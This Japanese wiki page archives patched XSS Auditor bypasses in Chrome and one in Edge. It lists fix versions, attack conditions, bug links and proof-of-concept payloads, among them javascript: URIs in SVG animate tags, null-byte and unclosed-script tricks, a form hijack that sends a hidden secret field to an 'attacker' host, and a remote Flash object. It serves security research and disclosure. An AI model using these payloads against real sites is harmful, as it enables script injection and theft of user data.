-
Notifications
You must be signed in to change notification settings - Fork 210
Fixed Bypass Archive
塞がれたバイパスを参考までに掲載。
補足:
PoC 1はChrome 59、PoC 2はChrome 62で修正。
参考URL:
- https://bugs.chromium.org/p/chromium/issues/detail?id=709365
- https://bugs.chromium.org/p/chromium/issues/detail?id=738017
PoC 1:
<svg><animate href=#x attributeName=href values= javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
PoC 2:
<svg><animate xlink:href=#x attributeName=href values=javascript:alert(1) /><a id=x><rect width=100 height=100 /></a>
補足:
Chrome 61で修正。
攻撃可能条件:
- 任意のタグを書けるXSSがある
- 直後に空白文字がある
参考URL:
PoC:
https://vulnerabledoma.in/bypass/text?type=4&q=%3Cscript%3Ealert(1)%3C/script
<div> <script>alert(1)</script </div><div id="x"></div>
補足:
Chrome 62で修正。
攻撃可能条件:
- 任意のタグを書けるXSSがある
- nullバイトが出力される
- 直前に空白文字がない
参考URL:
PoC:
https://vulnerabledoma.in/bypass/text?q=%00%00%00%00%00%00%00%3Cscript%3Ealert(1)%3C/script%3E
[0x00][0x00][0x00][0x00][0x00][0x00][0x00]<script>alert(1)</script>
補足:
Chrome 62で修正。
攻撃可能条件:
- 任意のタグを書けるXSSがある
- 後続に改行をはさまずscriptタグの閉じタグがある
参考URL:
PoC:
https://vulnerabledoma.in/bypass/text?type=9&q=%3Cscript%3Ealert(1)%0A--%3E
<div><script>alert(1)
--></div><script src=/test.js></script>
補足:
Chrome 62で修正。
攻撃可能条件:
- 任意のタグを書けるXSSがある
- 秘密情報を含む既存のフォーム内容の送信先になれる位置に新たなformタグを置ける
参考URL:
PoC:
(フォーム内にいる場合) https://vulnerabledoma.in/bypass/form?q=%22%3E%3C/form%3E%3Cform%20action=https://attacker/
<form action="form">
<input type="hidden" name="q" value=""></form><form action=https://attacker/">
<input type="hidden" name="secret" value="a09d3ef0">
<input type="submit">
</form>
(フォーム外にいる場合) https://vulnerabledoma.in/bypass/form2?q=%3Cbutton%20form=f%3ECLICK%3Cform%20id=f%20action=https://attacker/
<div><button form=f>CLICK<form id=f action=https://attacker/</div>
<form action="form2">
<input type="hidden" name="secret" value="a09d3ef0">
</form>
補足:
Chrome 64で修正。
攻撃可能条件:
- 任意のタグを書けるXSSがある
- ターゲットの環境でFlashが利用できる
参考URL:
PoC:
<object allowscriptaccess=always><param name=url value=https://l0.cm/xss.swf>
<object allowscriptaccess=always><param name=code value=https://l0.cm/xss.swf>
補足:
Chrome 65で修正。
攻撃可能条件:
- 任意のタグを書けるXSSがある
- 直後に空白文字がある
- それ以降に
'"
がある
参考URL:
PoC:
<div> <a href=/**/alert(1)>XSS</a><base href="javascript:\ </div><div id="x"></div>
補足:
2018年4月の時点で修正を確認。
攻撃可能条件:
- 反射型のXSSがある
参考URL:
PoC:
https://l0.cm/bypass/edge_referer_spoofing.html
<script>
//Found by @magicmac2000
function go(){
var win = window.open("edge_referer_spoofing_redirector");
var ifr = win.document.createElement("iframe");
win.document.appendChild(ifr);
win[0].opener = win;
win[0].setTimeout("alert('wait');opener.location='https://vulnerabledoma.in/bypass/text?q=<script>alert(1)<\/script>'");
}
</script>
<button onclick=go()>go</button>